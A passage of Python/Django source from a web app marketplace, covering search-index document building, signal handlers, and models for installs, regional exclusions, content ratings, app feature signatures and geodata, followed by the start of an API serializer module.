            mapping[doc_type]['properties'].update(
                _locale_field_mapping('description', analyzer))

        # TODO: reviewer flags (bug 848446)

        return mapping

    @classmethod
    def extract_document(cls, pk, obj=None):
        """Extracts the ElasticSearch index document for this instance."""
        if obj is None:
            obj = cls.get_model().objects.no_cache().get(pk=pk)

        latest_version = obj.latest_version
        version = obj.current_version
        geodata = obj.geodata
        features = (version.features.to_dict()
                    if version else AppFeatures().to_dict())
        is_escalated = obj.escalationqueue_set.exists()

        try:
            status = latest_version.statuses[0][1] if latest_version else None
        except IndexError:
            status = None

        installed_ids = list(Installed.objects.filter(addon=obj)
                             .values_list('id', flat=True))

        # Straight attribute copies from the model.
        attrs = ('app_slug', 'average_daily_users', 'bayesian_rating',
                 'created', 'id', 'is_disabled', 'last_updated', 'modified',
                 'premium_type', 'status', 'type', 'uses_flash',
                 'weekly_downloads')
        d = dict(zip(attrs, attrgetter(*attrs)(obj)))

        d['app_type'] = obj.app_type_id
        d['author'] = obj.developer_name
        d['banner_regions'] = geodata.banner_regions_slugs()
        d['category'] = list(obj.categories.values_list('slug', flat=True))
        # Only public apps expose collection membership.
        if obj.is_public:
            d['collection'] = [{'id': cms.collection_id, 'order': cms.order}
                               for cms in obj.collectionmembership_set.all()]
        else:
            d['collection'] = []
        d['content_ratings'] = (obj.get_content_ratings_by_body(es=True) or
                                None)
        d['content_descriptors'] = obj.get_descriptors_slugs()
        d['current_version'] = version.version if version else None
        d['default_locale'] = obj.default_locale
        d['description'] = list(
            set(string for _, string in obj.translations[obj.description_id]))
        d['device'] = getattr(obj, 'device_ids', [])
        d['features'] = features
        d['has_public_stats'] = obj.public_stats
        d['icon_hash'] = obj.icon_hash
        d['interactive_elements'] = obj.get_interactives_slugs()
        d['is_escalated'] = is_escalated
        d['is_offline'] = getattr(obj, 'is_offline', False)
        if latest_version:
            d['latest_version'] = {
                'status': status,
                'is_privileged': latest_version.is_privileged,
                'has_editor_comment': latest_version.has_editor_comment,
                'has_info_request': latest_version.has_info_request,
            }
        else:
            d['latest_version'] = {
                'status': None,
                'is_privileged': None,
                'has_editor_comment': None,
                'has_info_request': None,
            }
        d['manifest_url'] = obj.get_manifest_url()
        d['name'] = list(
            set(string for _, string in obj.translations[obj.name_id]))
        d['name_sort'] = unicode(obj.name).lower()
        d['owners'] = [au.user.id for au in
                       obj.addonuser_set.filter(role=amo.AUTHOR_ROLE_OWNER)]
        # Popularity (and the baseline boost) is the raw install count.
        d['popularity'] = d['_boost'] = len(installed_ids)
        d['previews'] = [{'filetype': p.filetype, 'modified': p.modified,
                          'id': p.id} for p in obj.previews.all()]
        try:
            p = obj.addonpremium.price
            d['price_tier'] = p.name
        except AddonPremium.DoesNotExist:
            d['price_tier'] = None
        d['ratings'] = {
            'average': obj.average_rating,
            'count': obj.total_reviews,
        }
        d['region_exclusions'] = obj.get_excluded_region_ids()
        d['reviewed'] = obj.versions.filter(
            deleted=False).aggregate(Min('reviewed')).get('reviewed__min')
        if version:
            d['supported_locales'] = filter(
                None, version.supported_locales.split(','))
        else:
            d['supported_locales'] = []

        d['tags'] = getattr(obj, 'tag_list', [])
        if obj.upsell and obj.upsell.premium.is_public():
            upsell_obj = obj.upsell.premium
            d['upsell'] = {
                'id': upsell_obj.id,
                'app_slug': upsell_obj.app_slug,
                'icon_url': upsell_obj.get_icon_url(128),
                # TODO: Store all localizations of upsell.name.
                'name': unicode(upsell_obj.name),
                'region_exclusions': upsell_obj.get_excluded_region_ids()
            }

        d['versions'] = [dict(version=v.version,
                              resource_uri=reverse_version(v))
                         for v in obj.versions.all()]

        # Calculate weight.  It's similar to popularity, except that we can
        # expose the number - it's relative to the max weekly downloads for
        # the whole database.
        max_downloads = float(
            Webapp.objects.aggregate(Max('weekly_downloads')).values()[0] or 0)
        if max_downloads:
            d['weight'] = math.ceil(d['weekly_downloads'] / max_downloads * 5)
        else:
            d['weight'] = 1

        # Handle our localized fields.
        for field in ('description', 'homepage', 'name', 'support_email',
                      'support_url'):
            d['%s_translations' % field] = [
                {'lang': to_language(lang), 'string': string}
                for lang, string
                in obj.translations[getattr(obj, '%s_id' % field)]
                if string]
        if version:
            # Version translations aren't attached by default; fetch them.
            amo.utils.attach_trans_dict(Version, [version])
            d['release_notes_translations'] = [
                {'lang': to_language(lang), 'string': string}
                for lang, string
                in version.translations[version.releasenotes_id]]
        else:
            d['release_notes_translations'] = None
        amo.utils.attach_trans_dict(Geodata, [geodata])
        d['banner_message_translations'] = [
            {'lang': to_language(lang), 'string': string}
            for lang, string
            in geodata.translations[geodata.banner_message_id]]

        # Per-region popularity currently mirrors the global value.
        for region in mkt.regions.ALL_REGION_IDS:
            d['popularity_%s' % region] = d['popularity']

        # Bump the boost if the add-on is public.
        if obj.status == amo.STATUS_PUBLIC:
            d['_boost'] = max(d['_boost'], 1) * 4

        # If the app is compatible with Firefox OS, push suggestion data in the
        # index - This will be used by RocketbarView API, which is specific to
        # Firefox OS.
        if DEVICE_GAIA.id in d['device'] and obj.is_public():
            d['name_suggest'] = {
                'input': d['name'],
                'output': unicode(obj.id),  # We only care about the payload.
                'weight': d['_boost'],
                'payload': {
                    'default_locale': d['default_locale'],
                    'icon_hash': d['icon_hash'],
                    'id': d['id'],
                    'manifest_url': d['manifest_url'],
                    'modified': d['modified'],
                    'name_translations': d['name_translations'],
                    'slug': d['app_slug'],
                }
            }

        # Indices for each language. languages is a list of locales we want to
        # index with analyzer if the string's locale matches.
        for analyzer, languages in amo.SEARCH_ANALYZER_MAP.iteritems():
            if (not settings.ES_USE_PLUGINS and
                analyzer in amo.SEARCH_ANALYZER_PLUGINS):
                continue

            d['name_' + analyzer] = list(
                set(string for locale, string in obj.translations[obj.name_id]
                    if locale.lower() in languages))
            d['description_' + analyzer] = list(
                set(string for locale, string
                    in obj.translations[obj.description_id]
                    if locale.lower() in languages))

        return d

    @classmethod
    def get_indexable(cls):
        """Returns the queryset of ids of all things to be indexed."""
        return (Webapp.with_deleted.all()
                .order_by('-id').values_list('id', flat=True))
# Set translated_fields manually to avoid querying translations for addon
# fields we don't use.
# NOTE(review): keep this list in sync with the translated fields the
# webapp code above actually reads (name, description, homepage, etc.).
Webapp._meta.translated_fields = [
    Webapp._meta.get_field('homepage'),
    Webapp._meta.get_field('privacy_policy'),
    Webapp._meta.get_field('name'),
    Webapp._meta.get_field('description'),
    Webapp._meta.get_field('support_email'),
    Webapp._meta.get_field('support_url'),
]
@receiver(dbsignals.post_save, sender=Webapp,
          dispatch_uid='webapp.search.index')
def update_search_index(sender, instance, **kw):
    # Reindex the app on save; also reindex the free app it upsells, so
    # its upsell data stays current. Skipped for raw (fixture) saves.
    from . import tasks
    if kw.get('raw'):
        return
    upsold = instance.upsold
    if upsold and upsold.free_id:
        tasks.index_webapps.delay([upsold.free_id])
    tasks.index_webapps.delay([instance.id])
@receiver(dbsignals.post_save, sender=AddonUpsell,
          dispatch_uid='addonupsell.search.index')
def update_search_index_upsell(sender, instance, **kw):
    # When saving an AddonUpsell instance, reindex both apps to update their
    # upsell/upsold properties in ES.
    from . import tasks
    for app in (instance.free, instance.premium):
        if app:
            tasks.index_webapps.delay([app.id])
# Persist Webapp's translated fields on save via the shared translations
# pre_save handler.
models.signals.pre_save.connect(save_signal, sender=Webapp,
                                dispatch_uid='webapp_translations')
@receiver(version_changed, dispatch_uid='update_cached_manifests')
def update_cached_manifests(sender, **kw):
    # Refresh the cached mini-manifest whenever a packaged app's version
    # changes. Hosted apps and raw saves are ignored.
    if kw.get('raw') or not sender.is_packaged:
        return
    from mkt.webapps.tasks import update_cached_manifests
    update_cached_manifests.delay(sender.id)
@Webapp.on_change
def watch_status(old_attr={}, new_attr={}, instance=None, sender=None, **kw):
    """Set nomination date when app is pending review."""
    # NOTE(review): the mutable dict defaults are only ever read here, never
    # mutated, so the usual mutable-default pitfall does not apply.
    new_status = new_attr.get('status')
    if not new_status:
        return
    addon = instance
    old_status = old_attr['status']
    # Log all status changes.
    if old_status != new_status:
        log.info(
            '[Webapp:{id}] Status changed from {old_status}:{old_status_name} '
            'to {new_status}:{new_status_name}'.format(
                id=addon.id, old_status=old_status,
                old_status_name=amo.STATUS_CHOICES_API[old_status],
                new_status=new_status,
                new_status_name=amo.STATUS_CHOICES_API[new_status]))
    if new_status == amo.STATUS_PENDING and old_status != new_status:
        # We always set nomination date when app switches to PENDING, even if
        # previously rejected.
        try:
            latest = addon.versions.latest()
            log.debug('[Webapp:%s] Setting nomination date to now.' % addon.id)
            latest.update(nomination=datetime.datetime.now())
        except Version.DoesNotExist:
            log.debug('[Webapp:%s] Missing version, no nomination set.'
                      % addon.id)
@receiver(dbsignals.post_save, sender=Webapp,
          dispatch_uid='webapp.pre_generate_apk')
def pre_generate_apk(sender=None, instance=None, **kw):
    """
    Pre-generate an Android APK for a public app.
    """
    if kw.get('raw'):
        return
    if not getattr(settings, 'PRE_GENERATE_APKS', False):
        log.info('[Webapp:{a}] APK pre-generation is disabled.'
                 .format(a=instance.id))
        return
    from . import tasks
    generated = False
    if instance.status in amo.WEBAPPS_APPROVED_STATUSES:
        # Only generate for apps targeting mobile or tablet devices.
        device_ids = set(device.id for device in instance.device_types)
        if device_ids & set([amo.DEVICE_MOBILE.id, amo.DEVICE_TABLET.id]):
            tasks.pre_generate_apk.delay(instance.id)
            generated = True
    log.info('[Webapp:{a}] APK pre-generated? {result}'
             .format(a=instance.id, result='YES' if generated else 'NO'))
class Installed(amo.models.ModelBase):
    """Track WebApp installations."""
    addon = models.ForeignKey('addons.Addon', related_name='installed')
    user = models.ForeignKey('users.UserProfile')
    # Opaque install identifier; filled in by the add_uuid post_save handler.
    uuid = models.CharField(max_length=255, db_index=True, unique=True)
    # Because the addon could change between free and premium,
    # we need to store the state at time of install here.
    premium_type = models.PositiveIntegerField(
        null=True, default=None, choices=amo.ADDON_PREMIUM_TYPES.items())
    # How the install happened (e.g. user-initiated); see mkt constants.
    install_type = models.PositiveIntegerField(
        db_index=True, default=apps.INSTALL_TYPE_USER,
        choices=apps.INSTALL_TYPES.items())
    class Meta:
        db_table = 'users_install'
        unique_together = ('addon', 'user', 'install_type')
@receiver(models.signals.post_save, sender=Installed)
def add_uuid(sender, **kw):
    """On first save, give the install a uuid and snapshot the addon's
    premium type (it may change later)."""
    if kw.get('raw'):
        return
    install = kw['instance']
    if install.uuid or install.premium_type is not None:
        # Already initialized; nothing to do.
        return
    install.uuid = '%s-%s' % (install.pk, str(uuid.uuid4()))
    install.premium_type = install.addon.premium_type
    install.save()
class AddonExcludedRegion(amo.models.ModelBase):
    """
    Apps are listed in all regions by default.
    When regions are unchecked, we remember those excluded regions.
    """
    addon = models.ForeignKey('addons.Addon',
                              related_name='addonexcludedregion')
    # Numeric region id; see mkt.regions for the id <-> region mapping.
    region = models.PositiveIntegerField(
        choices=mkt.regions.REGIONS_CHOICES_ID)
    class Meta:
        db_table = 'addons_excluded_regions'
        unique_together = ('addon', 'region')
    def __unicode__(self):
        region = self.get_region()
        return u'%s: %s' % (self.addon, region.slug if region else None)
    def get_region(self):
        # Returns the region class for self.region, or None if unknown.
        return mkt.regions.REGIONS_CHOICES_ID_DICT.get(self.region)
@memoize(prefix='get_excluded_in')
def get_excluded_in(region_id):
    """
    Return IDs of Webapp objects excluded from a particular region or excluded
    due to Geodata flags.

    The result is memoized per region; clean_memoized_exclusions invalidates
    the cache when exclusions change.
    """
    aers = list(AddonExcludedRegion.objects.filter(region=region_id)
                .values_list('addon', flat=True))
    # For pre-IARC unrated games in Brazil/Germany.
    geodata_qs = Q()
    region = parse_region(region_id)
    if region in (mkt.regions.BR, mkt.regions.DE):
        geodata_qs |= Q(**{'region_%s_iarc_exclude' % region.slug: True})
    # For USK_RATING_REFUSED apps in Germany.
    if region == mkt.regions.DE:
        geodata_qs |= Q(**{'region_de_usk_exclude': True})
    geodata_exclusions = []
    # An empty Q() is falsy, so the Geodata query only runs when at least
    # one exclusion flag applies to this region.
    if geodata_qs:
        geodata_exclusions = list(Geodata.objects.filter(geodata_qs)
                                  .values_list('addon', flat=True))
    return set(aers + geodata_exclusions)
@receiver(models.signals.post_save, sender=AddonExcludedRegion,
          dispatch_uid='clean_memoized_exclusions')
def clean_memoized_exclusions(sender, **kw):
    """
    Invalidate the memoized get_excluded_in() cache for every region
    whenever an AddonExcludedRegion row is saved.

    Skipped for raw (fixture) saves.
    """
    if not kw.get('raw'):
        # The previous version wrapped this delete_many in an extra
        # `for k in ALL_REGION_IDS` loop, deleting the same complete key
        # set once per region (O(n^2) cache deletes). One pass over all
        # region ids is sufficient and has identical effect.
        cache.delete_many([memoize_key('get_excluded_in', k)
                           for k in mkt.regions.ALL_REGION_IDS])
class IARCInfo(amo.models.ModelBase):
    """
    Stored data for IARC.
    """
    addon = models.OneToOneField(Addon, related_name='iarc_info')
    # Identifier for the app's rating certificate submission.
    # NOTE(review): presumably issued by the IARC service — confirm.
    submission_id = models.PositiveIntegerField(null=False)
    security_code = models.CharField(max_length=10)
    class Meta:
        db_table = 'webapps_iarc_info'
    def __unicode__(self):
        return u'app:%s' % self.addon.app_slug
class ContentRating(amo.models.ModelBase):
    """
    Ratings body information about an app.

    One row per (app, ratings body) pair; `rating` is an index into the
    body's ratings list (see get_rating_class).
    """
    addon = models.ForeignKey('addons.Addon', related_name='content_ratings')
    ratings_body = models.PositiveIntegerField(
        choices=[(k, rb.name) for k, rb in
                 mkt.ratingsbodies.RATINGS_BODIES.items()],
        null=False)
    rating = models.PositiveIntegerField(null=False)
    class Meta:
        db_table = 'webapps_contentrating'
        unique_together = ('addon', 'ratings_body')
    def __unicode__(self):
        return u'%s: %s' % (self.addon, self.get_label())
    def get_regions(self):
        """Gives us a list of Region classes that use this rating body."""
        # All regions w/o specified ratings bodies fallback to Generic.
        generic_regions = []
        if (waffle.switch_is_active('iarc') and
            self.get_body_class() == mkt.ratingsbodies.GENERIC):
            generic_regions = mkt.regions.ALL_REGIONS_WITHOUT_CONTENT_RATINGS()
        return ([x for x in mkt.regions.ALL_REGIONS_WITH_CONTENT_RATINGS()
                 if self.get_body_class() == x.ratingsbody] +
                list(generic_regions))
    def get_region_slugs(self):
        """Gives us the region slugs that use this rating body."""
        if (waffle.switch_is_active('iarc') and
            self.get_body_class() == mkt.ratingsbodies.GENERIC):
            # For the generic rating body, we just pigeonhole all of the misc.
            # regions into one region slug, GENERIC. Reduces redundancy in the
            # final data structure. Rather than
            # {'pe': {generic_rating}, 'ar': {generic_rating}, etc}, generic
            # regions will just use single {'generic': {generic rating}}
            return [mkt.regions.GENERIC_RATING_REGION_SLUG]
        return [x.slug for x in self.get_regions()]
    def get_body_class(self):
        # Ratings body class (e.g. ESRB, PEGI) for this row.
        return mkt.ratingsbodies.RATINGS_BODIES[self.ratings_body]
    def get_body(self):
        """Ratings body instance with translated strings attached."""
        return mkt.ratingsbodies.dehydrate_ratings_body(self.get_body_class())
    def get_rating_class(self):
        # Rating class within the body, indexed by self.rating.
        return self.get_body_class().ratings[self.rating]
    def get_rating(self):
        """Ratings instance with translated strings attached."""
        return mkt.ratingsbodies.dehydrate_rating(self.get_rating_class())
    def get_label(self):
        """Gives us the name to be used for the form options."""
        return u'%s - %s' % (self.get_body().name, self.get_rating().name)
def update_status_content_ratings(sender, instance, **kw):
    """Flip the app's status out of NULL once a new content rating makes
    the app fully complete."""
    app = instance.addon
    if app.has_incomplete_status() and app.is_fully_complete():
        app.update(status=amo.STATUS_PENDING)
# Re-check app completeness whenever a ContentRating row is saved.
models.signals.post_save.connect(update_status_content_ratings,
                                 sender=ContentRating,
                                 dispatch_uid='c_rating_update_app_status')
# The RatingDescriptors table is created with dynamic fields based on
# mkt.constants.ratingdescriptors.
class RatingDescriptors(amo.models.ModelBase, DynamicBoolFieldsMixin):
    """
    A dynamically generated model that contains a set of boolean values
    stating if an app is rated with a particular descriptor.

    The `has_<descriptor>` boolean columns are attached after the class
    definition (see the loop below this class).
    """
    addon = models.OneToOneField(Addon, related_name='rating_descriptors')
    field_source = mkt.ratingdescriptors.RATING_DESCS
    class Meta:
        db_table = 'webapps_rating_descriptors'
    def __unicode__(self):
        return u'%s: %s' % (self.id, self.addon.name)
    def iarc_deserialize(self, body=None):
        """Map our descriptor strings back to the IARC ones (comma-sep.).

        If `body` is given, only descriptors belonging to that ratings
        body are included.
        """
        keys = self.to_keys()
        if body:
            keys = [key for key in keys if body.iarc_name.lower() in key]
        # NOTE(review): REVERSE_DESC_MAPPING.get() returns None for an
        # unmapped key, which would make join() raise — presumably every
        # key is mapped; confirm.
        return ', '.join(REVERSE_DESC_MAPPING.get(desc) for desc in keys)
# Add a dynamic field to `RatingDescriptors` model for each rating descriptor.
# Fields are named `has_<descriptor>` (lowercased key).
for k, v in mkt.ratingdescriptors.RATING_DESCS.iteritems():
    field = models.BooleanField(default=False, help_text=v['name'])
    field.contribute_to_class(RatingDescriptors, 'has_%s' % k.lower())
# The RatingInteractives table is created with dynamic fields based on
# mkt.constants.ratinginteractives.
class RatingInteractives(amo.models.ModelBase, DynamicBoolFieldsMixin):
    """
    A dynamically generated model that contains a set of boolean values
    stating if an app features a particular interactive element.

    The `has_<element>` boolean columns are attached after the class
    definition (see the loop below this class).
    """
    addon = models.OneToOneField(Addon, related_name='rating_interactives')
    field_source = mkt.ratinginteractives.RATING_INTERACTIVES
    class Meta:
        db_table = 'webapps_rating_interactives'
    def __unicode__(self):
        return u'%s: %s' % (self.id, self.addon.name)
    def iarc_deserialize(self):
        """Map our interactive-element strings back to the IARC ones
        (comma-sep.)."""
        # NOTE(review): REVERSE_INTERACTIVES_MAPPING.get() returns None for
        # an unmapped key, which would make join() raise — confirm all keys
        # are mapped.
        return ', '.join(REVERSE_INTERACTIVES_MAPPING.get(inter)
                         for inter in self.to_keys())
# Add a dynamic field to `RatingInteractives` model for each rating descriptor.
# Fields are named `has_<element>` (lowercased key).
for k, v in mkt.ratinginteractives.RATING_INTERACTIVES.iteritems():
    field = models.BooleanField(default=False, help_text=v['name'])
    field.contribute_to_class(RatingInteractives, 'has_%s' % k.lower())
def iarc_cleanup(*args, **kwargs):
    """Delete every IARC-related row for the addon being deleted so its
    certificate can be re-used later."""
    instance = kwargs.get('instance')
    for model in (IARCInfo, ContentRating, RatingDescriptors,
                  RatingInteractives):
        model.objects.filter(addon=instance).delete()
# When an app is deleted we need to remove the IARC data so the certificate can
# be re-used later.
models.signals.post_delete.connect(iarc_cleanup, sender=Addon,
                                   dispatch_uid='webapps_iarc_cleanup')
# The AppFeatures table is created with dynamic fields based on
# mkt.constants.features, which requires some setup work before we call `type`.
class AppFeatures(amo.models.ModelBase, DynamicBoolFieldsMixin):
    """
    A dynamically generated model that contains a set of boolean values
    stating if an app requires a particular feature.

    The `has_<feature>` boolean columns are attached after the class
    definition (see the loop below this class).
    """
    version = models.OneToOneField(Version, related_name='features')
    field_source = APP_FEATURES

    class Meta:
        db_table = 'addons_features'

    def __unicode__(self):
        return u'Version: %s: %s' % (self.version.id, self.to_signature())

    def set_flags(self, signature):
        """
        Sets flags given the signature.

        This takes the reverse steps in `to_signature` to set the various
        flags given a signature. Bit math is used since "0.23.1" is a valid
        signature but does not produce a string of required length when
        doing string indexing.
        """
        fields = self._fields()
        try:
            # Parse the hex profile part directly to an int. The previous
            # implementation used bin(...).lstrip('0b'), but lstrip strips
            # a *set of characters*, not a prefix: bin(0) == '0b0' became
            # '' and int('', 2) raised ValueError for the valid all-zero
            # signature '0.23.1'. Parsing the hex value avoids the string
            # round-trip entirely.
            profile = int(signature.split('.')[0], 16)
            n = len(fields) - 1
            for i, f in enumerate(fields):
                # Bit (n - i) of the profile corresponds to field i, the
                # mirror of how to_signature() builds the bit string.
                setattr(self, f, bool(profile & 2 ** (n - i)))
        except ValueError as e:
            # Malformed (non-hex) profile part; leave flags untouched.
            log.error(u'ValueError converting %s. %s' % (signature, e))

    def to_signature(self):
        """
        This converts the boolean values of the flags to a signature string.

        For example, all the flags in APP_FEATURES order produce a string of
        binary digits that is then converted to a hexadecimal string with the
        length of the features list plus a version appended. E.g.::

            >>> profile = '10001010111111010101011'
            >>> int(profile, 2)
            4554411
            >>> '%x' % int(profile, 2)
            '457eab'
            >>> '%x.%s.%s' % (int(profile, 2), len(profile), 1)
            '457eab.23.1'
        """
        profile = ''.join('1' if getattr(self, f) else '0'
                          for f in self._fields())
        return '%x.%s.%s' % (int(profile, 2), len(profile),
                             settings.APP_FEATURES_VERSION)
# Add a dynamic field to `AppFeatures` model for each buchet feature.
# Fields are named `has_%s` (lowercased key); their order drives the
# signature produced by AppFeatures.to_signature().
for k, v in APP_FEATURES.iteritems():
    field = models.BooleanField(default=False, help_text=v['name'])
    field.contribute_to_class(AppFeatures, 'has_%s' % k.lower())
class AppManifest(amo.models.ModelBase):
    """
    Storage for manifests.

    Tied to version since they change between versions. This stores both hosted
    and packaged apps manifests for easy access.
    """
    version = models.OneToOneField(Version, related_name='manifest_json')
    # Raw manifest document, stored as text.
    manifest = models.TextField()
    class Meta:
        db_table = 'app_manifest'
class RegionListField(json_field.JSONField):
    """JSON field whose deserialized value is a list of int region ids."""

    def to_python(self, value):
        # Coerce each stored entry to int; falsy values (None, empty list)
        # pass through unchanged.
        value = super(RegionListField, self).to_python(value)
        return [int(v) for v in value] if value else value
class Geodata(amo.models.ModelBase):
    """TODO: Forgo AER and use bool columns for every region and carrier.

    Per-app geographic metadata. Dynamic per-region status/nomination
    columns are attached after the class definition (see loops below).
    """
    addon = models.OneToOneField('addons.Addon', related_name='_geodata')
    restricted = models.BooleanField(default=False)
    popular_region = models.CharField(max_length=10, null=True)
    banner_regions = RegionListField(default=None, null=True)
    banner_message = PurifiedField()
    # Exclude apps with USK_RATING_REFUSED in Germany.
    region_de_usk_exclude = models.BooleanField(default=False)
    class Meta:
        db_table = 'webapps_geodata'
    def __unicode__(self):
        return u'%s (%s): <Webapp %s>' % (
            self.id, 'restricted' if self.restricted else 'unrestricted',
            self.addon.id)
    def get_status(self, region):
        """
        Return the status of listing in a given region (e.g., China).
        """
        # Falls back to STATUS_PUBLIC for regions without a status column.
        return getattr(self, 'region_%s_status' % parse_region(region).slug,
                       amo.STATUS_PUBLIC)
    def set_status(self, region, status, save=False):
        """Return a tuple of `(value, changed)`."""
        value, changed = None, False
        attr = 'region_%s_status' % parse_region(region).slug
        if hasattr(self, attr):
            # NOTE(review): setattr() returns None, so `value` is always
            # None here and the method actually returns `(None, changed)`;
            # `changed` ends up True whenever the new status is not None.
            # Confirm whether `value = status` was intended.
            value = setattr(self, attr, status)
            if self.get_status(region) != value:
                changed = True
                # Save only if the value is different.
                if save:
                    self.save()
        return None, changed
    def get_status_slug(self, region):
        # Human-readable slug for the region's status; 'unavailable' for
        # anything not pending/public/rejected.
        return {
            amo.STATUS_PENDING: 'pending',
            amo.STATUS_PUBLIC: 'public',
            amo.STATUS_REJECTED: 'rejected',
        }.get(self.get_status(region), 'unavailable')
    @classmethod
    def get_status_messages(cls):
        # Localized messages keyed by the slugs from get_status_slug().
        return {
            # L10n: An app is awaiting approval for a particular region.
            'pending': _('awaiting approval'),
            # L10n: An app is rejected for a particular region.
            'rejected': _('rejected'),
            # L10n: An app requires additional review for a particular region.
            'unavailable': _('requires additional review')
        }
    def banner_regions_names(self):
        # Sorted, localized names of the regions targeted by the banner.
        if self.banner_regions is None:
            return []
        return sorted(unicode(mkt.regions.REGIONS_CHOICES_ID_DICT.get(k).name)
                      for k in self.banner_regions)
    def banner_regions_slugs(self):
        # Sorted slugs of the regions targeted by the banner.
        if self.banner_regions is None:
            return []
        return sorted(unicode(mkt.regions.REGIONS_CHOICES_ID_DICT.get(k).slug)
                      for k in self.banner_regions)
    def get_nominated_date(self, region):
        """
        Return the timestamp of when the app was approved in a region.
        """
        return getattr(self,
                       'region_%s_nominated' % parse_region(region).slug)
    def set_nominated_date(self, region, timestamp=None, save=False):
        """Return a tuple of `(value, saved)`."""
        value, changed = None, False
        attr = 'region_%s_nominated' % parse_region(region).slug
        if hasattr(self, attr):
            if timestamp is None:
                timestamp = datetime.datetime.now()
            # NOTE(review): as in set_status, setattr() returns None, so
            # `value` is always None and the comparison below is against
            # None — confirm intent.
            value = setattr(self, attr, timestamp)
            if self.get_nominated_date(region) != value:
                changed = True
                # Save only if the value is different.
                if save:
                    self.save()
        return None, changed
# (1) Add a dynamic status field to `Geodata` model for each special region:
# - 0: STATUS_NULL (Unavailable)
# - 2: STATUS_PENDING (Pending)
# - 4: STATUS_PUBLIC (Public)
# - 12: STATUS_REJECTED (Rejected)
#
# (2) Add a dynamic nominated field to keep track of timestamp for when
# the developer requested approval for each region.
for region in mkt.regions.SPECIAL_REGIONS:
    help_text = _('{region} approval status').format(region=region.name)
    field = models.PositiveIntegerField(help_text=help_text,
        choices=amo.MKT_STATUS_CHOICES.items(), db_index=True, default=0)
    field.contribute_to_class(Geodata, 'region_%s_status' % region.slug)
    help_text = _('{region} nomination date').format(region=region.name)
    field = models.DateTimeField(help_text=help_text, null=True)
    field.contribute_to_class(Geodata, 'region_%s_nominated' % region.slug)
# Add a dynamic field to `Geodata` model to exclude pre-IARC public unrated
# Brazil and Germany games.
for region in (mkt.regions.BR, mkt.regions.DE):
    field = models.BooleanField(default=False)
    field.contribute_to_class(Geodata, 'region_%s_iarc_exclude' % region.slug)
# Save geodata translations when a Geodata instance is saved.
models.signals.pre_save.connect(save_signal, sender=Geodata,
                                dispatch_uid='geodata_translations')
########NEW FILE########
__FILENAME__ = serializers
import json
from decimal import Decimal
from django.core.urlresolvers import reverse
from rest_framework import response, serializers
from tower import ungettext as ngettext
import amo
from addons.models import AddonCategory, AddonUpsell, Category
from amo.utils import no_translation
from constants.payments import PROVIDER_BANGO
import mkt
from mkt.api.fields import (LargeTextField, SemiSerializerMethodField,
ReverseChoiceField, TranslationSerializerField)
from mkt.constants.features import FeatureProfile
from mkt.submit.forms import mark_for_rereview
from mkt.submit.serializers import PreviewSerializer, SimplePreviewSerializer
from mkt.webapps.models import AppFeatures, Webapp
from mkt.prices.models import AddonPremium, Price
class AppFeaturesSerializer(serializers.ModelSerializer):
    """Serialize an AppFeatures row, adding the decoded feature list."""
    class Meta:
        model = AppFeatures
    def to_native(self, obj):
        # Attach the human-readable list of required features, decoded
        # from the row's feature signature.
        ret = super(AppFeaturesSerializer, self).to_native(obj)
        profile = FeatureProfile.from_signature(obj.to_signature())
        ret['required'] = profile.to_list()
        return ret
def http_error(errorclass, reason, extra_data=None):
    """Instantiate `errorclass`, attach a JSON body with `reason` (plus
    optional `extra_data`), and wrap it in a DRF Response."""
    r = errorclass()
    payload = {'reason': reason}
    if extra_data:
        payload.update(extra_data)
    r.content = json.dumps(payload)
    return response.Response(r)
class RegionSerializer(serializers.Serializer):
    """Serialize a region object (name, slug, mcc, adolescent flag)."""
    name = serializers.CharField()
    slug = serializers.CharField()
    # Mobile country code associated with the region.
    mcc = serializers.CharField()
    adolescent = serializers.BooleanField()
class AppSerializer(serializers.ModelSerializer):
    """Full DRF serializer for Webapp objects used by the public app API.

    Handles read-side derived fields (prices, ratings, regions, ...) and
    write-side side effects (categories, device types, upsell, price).
    """
    app_type = serializers.ChoiceField(
        choices=amo.ADDON_WEBAPP_TYPES_LOOKUP.items(), read_only=True)
    author = serializers.CharField(source='developer_name', read_only=True)
    banner_message = TranslationSerializerField(read_only=True,
        source='geodata.banner_message')
    banner_regions = serializers.Field(source='geodata.banner_regions_slugs')
    categories = serializers.SlugRelatedField(source='categories',
        many=True, slug_field='slug', required=True,
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
    content_ratings = serializers.SerializerMethodField('get_content_ratings')
    created = serializers.DateField(read_only=True)
    current_version = serializers.CharField(
        source='current_version.version',
        read_only=True)
    default_locale = serializers.CharField(read_only=True)
    device_types = SemiSerializerMethodField('get_device_types')
    description = TranslationSerializerField(required=False)
    homepage = TranslationSerializerField(required=False)
    icons = serializers.SerializerMethodField('get_icons')
    id = serializers.IntegerField(source='pk', required=False)
    is_packaged = serializers.BooleanField(read_only=True)
    manifest_url = serializers.CharField(source='get_manifest_url',
                                         read_only=True)
    name = TranslationSerializerField(required=False)
    payment_account = serializers.SerializerMethodField('get_payment_account')
    payment_required = serializers.SerializerMethodField(
        'get_payment_required')
    premium_type = ReverseChoiceField(
        choices_dict=amo.ADDON_PREMIUM_API, required=False)
    previews = PreviewSerializer(many=True, required=False,
                                 source='all_previews')
    price = SemiSerializerMethodField('get_price')
    price_locale = serializers.SerializerMethodField('get_price_locale')
    privacy_policy = LargeTextField(view_name='app-privacy-policy-detail',
                                    required=False)
    public_stats = serializers.BooleanField(read_only=True)
    ratings = serializers.SerializerMethodField('get_ratings_aggregates')
    regions = RegionSerializer(read_only=True, source='get_regions')
    release_notes = TranslationSerializerField(read_only=True,
        source='current_version.releasenotes')
    resource_uri = serializers.HyperlinkedIdentityField(view_name='app-detail')
    slug = serializers.CharField(source='app_slug', required=False)
    status = serializers.IntegerField(read_only=True)
    support_email = TranslationSerializerField(required=False)
    support_url = TranslationSerializerField(required=False)
    supported_locales = serializers.SerializerMethodField(
        'get_supported_locales')
    tags = serializers.SerializerMethodField('get_tags')
    upsell = serializers.SerializerMethodField('get_upsell')
    upsold = serializers.HyperlinkedRelatedField(
        view_name='app-detail', source='upsold.free',
        required=False, queryset=Webapp.objects.all())
    user = serializers.SerializerMethodField('get_user_info')
    versions = serializers.SerializerMethodField('get_versions')
    weekly_downloads = serializers.SerializerMethodField(
        'get_weekly_downloads')
    class Meta:
        model = Webapp
        fields = [
            'app_type', 'author', 'banner_message', 'banner_regions',
            'categories', 'content_ratings', 'created', 'current_version',
            'default_locale', 'description', 'device_types', 'homepage',
            'icons', 'id', 'is_packaged', 'manifest_url', 'name',
